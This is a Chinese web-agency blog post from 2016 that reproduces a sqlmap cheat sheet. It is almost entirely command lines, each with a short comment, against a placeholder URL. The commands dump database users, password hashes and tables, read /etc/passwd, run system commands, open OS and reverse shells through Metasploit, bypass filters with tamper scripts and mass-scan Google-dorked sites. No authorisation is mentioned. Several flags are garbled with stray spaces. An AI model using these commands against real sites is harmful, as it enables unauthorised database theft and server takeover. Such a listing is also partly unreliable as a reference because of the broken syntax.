全国服务热线:400-6566-535 广州热线:020-82105691 客服QQ:858560031
后台演示 猪八戒 阿里巴巴商铺 手机版
网络营销电子商务建站知识编程知识行业资讯SEO知识常见问题网络安全
您当前位置: 首页 >资讯活动 > 网络安全 > Sqlmap 最新测试文档

Sqlmap 最新测试文档

时间:2016-06-17 作者:七想网络

 


sqlmap -h

官方最新文档:http://sqlmap.sourceforge.net/doc/README.html

sqlmap -u "http://url/news?id=1"

--current-user # 获取当前用户名称

sqlmap -u "http://www.xxoo.com/news?id=1"

--current-db  # 获取当前数据库名称

sqlmap -u "http://www.xxoo.com/news?id=1"

--tables  -D "db_name" #列表名

sqlmap -u "http://url/news?id=1"

--columns -T "tablename" users-D "db_name" - v 0 #列字段

sqlmap -u "http://url/news?id=1"

--dump

- C "column_name"  -T "table_name" - D

"db_name" -v 0  # 获取字段内容

 

 


****************** 信息获取 ******************

sqlmap -u "http://url/news?id=1"  --smart  --level 3 --users  # smart 智能 level  执行测试等级

sqlmap -u "http://url/news?id=1"  --dbms "Mysql" --users  # dbms 指定数据库类型

sqlmap -u "http://url/news?id=1"    --users  # 列数据库用户

sqlmap -u "http://url/news?id=1"    --dbs# 列数据库

sqlmap -u "http://url/news?id=1"   --passwords # 数据库用户密码

sqlmap -u "http://url/news?id=1"   --passwords-U root -v 0 # 列出指定用户数据库密码

sqlmap -u "http://url/news?id=1"    --dump -C "password,user,id" -T "tablename" - D "db_name" -

 

- start 1 --stop 20  #列出指定字段,列出 20 条

sqlmap -u "http://url/news?id=1"    --dump-all -v 0 #列出所有数据库所有表

sqlmap -u "http://url/news?id=1"   --privileges # 查看权限

sqlmap -u "http://url/news?id=1"   --privileges -U root # 查看指定用户权限

sqlmap -u "http://url/news?id=1"    --is-dba - v 1 #是否是数据库管理员

sqlmap -u "http://url/news?id=1"    --roles # 枚举数据库用户角色

sqlmap -u "http://url/news?id=1"   --udf-inject # 导入用户自定义函数(获取系统权限!)

sqlmap -u "http://url/news?id=1"   --dump-all --exclude-sysdbs -v 0 # 列出当前库所有表

sqlmap -u "http://url/news?id=1"   --union-cols #union 查询表记录

sqlmap -u "http://url/news?id=1"   --cookie "COOKIE_VALUE" #cookie 注入

sqlmap -u "http://url/news?id=1"   -b # 获取 banner 信息

sqlmap -u "http://url/news?id=1" --data "id=3"  #post 注入

sqlmap -u "http://url/news?id=1"  -v 1 -f # 指纹判别数据库类型

sqlmap -u "http://url/news?id=1"  --proxy"http://127.0.0.1:8118" # 代理注入

sqlmap -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE"  # 指定关键词

sqlmap -u "http://url/news?id=1"   --sql-shell # 执行指定 sql 命令

sqlmap -u "http://url/news?id=1"   --file /etc/passwd

sqlmap -u "http://url/news?id=1"   --os-cmd=whoami # 执行系统命令

sqlmap -u "http://url/news?id=1"   --os-shell # 系统交互 shell

sqlmap -u "http://url/news?id=1"   --os-pwn #反弹 shell

sqlmap -u "http://url/news?id=1"   --reg-read #读取 win 系统注册表

sqlmap -u "http://url/news?id=1"    --dbs-o "sqlmap.log" # 保存进度

sqlmap -u "http://url/news?id=1"    --dbs  -o "sqlmap.log" --resume  # 恢复已保存进度

sqlmap -u "http://url/news?id=1"    --msf-path=/opt/metasploit3/msf2 --os-pwn 反弹 shell 需

metasploit 路径

sqlmap -u "http://url/news?id=1"  --tamper "base64encode.py"  加载脚本( 可利用绕过注入限制)

sqlmap -g "google 语法" --dump-all --batch #google 搜索注入点自动 跑出所有字段 攻击实例:

sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d 28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password




 

上一篇dedecms网站如何进行安全设置

下一篇sqlmap 详细用法

准备开展业务? 立即创建网站 成为代理商
网络营销
  1. 企业网站如何做好网站优化与推广工作?
  2. 中小企业怎样做网络营销 广州七想网络...
  3. 网络营销并不神秘,七想网络带您揭开秘...
  4. 透过优衣库事件 看网络营销?
  5. QQ营销推广技巧?
  6. 中小企业网站如何推广才有效果呢?
Copyright © 2009-2016 七想网络, All Rights Reserved
  粤ICP备16097683号